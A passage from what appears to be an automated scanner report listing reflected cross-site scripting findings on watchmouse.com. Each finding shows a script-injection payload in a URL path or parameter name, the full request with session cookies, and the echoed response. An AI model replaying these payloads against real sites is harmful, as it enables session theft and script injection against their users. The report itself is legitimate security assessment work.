<form id="login_form" action="https://secure.watchmouse.com/en/fr5250b"><script>alert(1)</script>2f139ca9dcd/register.php" method="post">
...[SNIP]...

1.282. http://www.watchmouse.com/fr/register.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/register.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0af3"><script>alert(1)</script>5a821d50b04 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/register.phpf0af3"><script>alert(1)</script>5a821d50b04 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:07 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-8ab92156b782f5d2c1835cc2fbe34ded"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/register.phpf0af3"><script>alert(1)</script>5a821d50b04" method="post">
...[SNIP]...

1.283. http://www.watchmouse.com/fr/register.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/register.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ece51"><script>alert(1)</script>a00884a751f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/register.php?vpackid=35&ece51"><script>alert(1)</script>a00884a751f=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:09:09 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-611d7c2d27726a9826081e50484dfd62"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<a href="/en/register.php?vpackid=35&ece51"><script>alert(1)</script>a00884a751f=1" onclick="$('#lang-menu').toggle();">
...[SNIP]...

1.284. http://www.watchmouse.com/it/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /it/

Issue detail

The value of the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 511d6"><script>alert(1)</script>4d9c68409ae was submitted in the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /it/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=1511d6"><script>alert(1)</script>4d9c68409ae HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:09:25 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-it-b9a94ab69743e5b71fa37291c075ed3c"
Content-Language: it
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/it/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=1511d6"><script>alert(1)</script>4d9c68409ae" method="post">
...[SNIP]...

1.285. http://www.watchmouse.com/it/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /it/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2ba3"><script>alert(1)</script>03e526316f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /itf2ba3"><script>alert(1)</script>03e526316f/ HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:14 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-76ee19b28a5b3f597dfcbd2b2776b99b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/itf2ba3"><script>alert(1)</script>03e526316f/" method="post">
...[SNIP]...

1.286. http://www.watchmouse.com/it/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /it/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ee6a"><script>alert(1)</script>48690ceb28a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /it/?7ee6a"><script>alert(1)</script>48690ceb28a=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:09:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-it-ff10bdaa89b60614ed28d19f67da7c95"
Content-Language: it
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/it/?7ee6a"><script>alert(1)</script>48690ceb28a=1" method="post">
...[SNIP]...

1.287. http://www.watchmouse.com/it/feature/public-status-page.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /it/feature/public-status-page.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8be22"><script>alert(1)</script>d14c70ea7fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /it8be22"><script>alert(1)</script>d14c70ea7fd/feature/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:53 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-c615ffe58b21da03f0e73df8f663bc28"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/it8be22"><script>alert(1)</script>d14c70ea7fd/feature/public-status-page.html" method="post">
...[SNIP]...

1.288. http://www.watchmouse.com/it/feature/public-status-page.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /it/feature/public-status-page.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbabe"><script>alert(1)</script>90596ac9e05 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /it/featuredbabe"><script>alert(1)</script>90596ac9e05/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:56 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-it-aeb9a875069c0782067304b0296f9124"
Content-Language: it
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/it/featuredbabe"><script>alert(1)</script>90596ac9e05/public-status-page.html" method="post">
...[SNIP]...

1.289. http://www.watchmouse.com/it/feature/public-status-page.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /it/feature/public-status-page.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12b9e"><script>alert(1)</script>7a54ab14dd5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /it/feature/public-status-page.html12b9e"><script>alert(1)</script>7a54ab14dd5 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:57 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-it-aacb57b559a2af435d7fe37a2e30f73a"
Content-Language: it
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/it/feature/public-status-page.html12b9e"><script>alert(1)</script>7a54ab14dd5" method="post">
...[SNIP]...

1.290. http://www.watchmouse.com/it/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /it/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a947"><script>alert(1)</script>f7928c7179e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /it2a947"><script>alert(1)</script>f7928c7179e/feature/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:32 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-e4998840e743c41536c4bd9cb540e2f3"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/it2a947"><script>alert(1)</script>f7928c7179e/feature/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.291. http://www.watchmouse.com/it/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /it/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b95d4"><script>alert(1)</script>edd65b60410 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /it/featureb95d4"><script>alert(1)</script>edd65b60410/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:34 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-it-73ac59ae4e7fd2c9a81abd21006e5623"
Content-Language: it
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/it/featureb95d4"><script>alert(1)</script>edd65b60410/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.292. http://www.watchmouse.com/it/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /it/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd42"><script>alert(1)</script>8f8a5b6cf20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /it/feature/transaction-monitoring-web-application-testing.htmlfbd42"><script>alert(1)</script>8f8a5b6cf20 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128